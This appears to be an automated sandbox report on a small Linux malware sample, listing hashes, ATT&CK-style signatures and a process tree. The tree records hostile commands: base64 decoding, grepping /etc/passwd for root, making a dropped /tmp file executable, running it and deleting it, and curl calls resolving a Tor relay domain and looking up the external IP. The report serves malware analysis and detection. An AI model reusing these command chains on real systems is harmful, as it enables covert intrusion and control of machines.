Analysis

  • max time kernel
    149s
  • max time network
    132s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    24/10/2024, 18:05

General

  • Target

    74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118

  • Size

    1KB

  • MD5

    74accae8c7e0093939ab4e0cd1c2a7fd

  • SHA1

    ae3b26988c72634e3f0daeb6486332530ba58324

  • SHA256

    d5b4d0376c9b07f5be237d0e47aa9aa321489917d30559328e544c5d0347e5ea

  • SHA512

    7e784dce4b2fa0f5a3659ccf7af43b3f4886bd5ea32acb26a60ccad38c5bc918789d7d01f2090bd3a053d783c6eba4571865f7e54de106232d83cae57e4172b9

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 1 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
    /tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
    1⤵
      PID:1494
      • /bin/bash
        bash
        2⤵
        • Writes file to tmp directory
        PID:1501
        • /usr/bin/cut
          cut -d: -f6
          3⤵
            PID:1505
          • /usr/bin/id
            id -u
            3⤵
            • Reads runtime system information
            PID:1507
          • /bin/grep
            grep x:0: /etc/passwd
            3⤵
              PID:1504
            • /usr/bin/head
              head -n 1 /tmp/.X11-unix/01
              3⤵
                PID:1510
              • /bin/ls
                ls /proc//status
                3⤵
                • Reads runtime system information
                PID:1511
              • /bin/chmod
                chmod +x ./i
                3⤵
                • File and Directory Permissions Modification
                PID:1512
              • /tmp/i
                ./i
                3⤵
                • Executes dropped EXE
                PID:1513
              • /bin/rm
                rm -f i
                3⤵
                  PID:1514
                • /usr/bin/tr
                  tr " " "\\n"
                  3⤵
                    PID:1519
                  • /usr/bin/sort
                    sort -uR
                    3⤵
                      PID:1521
                    • /usr/bin/head
                      head -n 1
                      3⤵
                        PID:1522
                      • /bin/grep
                        grep -Ev "[.]0"
                        3⤵
                          PID:1520
                        • /bin/grep
                          grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"
                          3⤵
                            PID:1518
                          • /usr/bin/curl
                            curl -4fsSLkA- -m200 "https://doh-fi.blahdns.com/dns-query?name=relay.tor2socks.in"
                            3⤵
                              PID:1517
                            • /bin/uname
                              uname -m
                              3⤵
                                PID:1524
                              • /usr/bin/cut
                                cut -f1 -d-
                                3⤵
                                  PID:1528
                                • /usr/bin/md5sum
                                  md5sum
                                  3⤵
                                    PID:1527
                                  • /bin/date
                                    date
                                    3⤵
                                      PID:1526
                                    • /usr/bin/curl
                                      curl -4fsSLk checkip.amazonaws.com
                                      3⤵
                                      • System Network Configuration Discovery
                                      PID:1530
                                  • /usr/bin/base64
                                    base64 -d
                                    2⤵
                                    • Deobfuscate/Decode Files or Information
                                    PID:1500

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • /tmp/i

                                  Filesize

                                  5B

                                  MD5

                                  f4b524261fce06c1fbd10b4681ad0b97

                                  SHA1

                                  c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d

                                  SHA256

                                  9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031

                                  SHA512

                                  ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449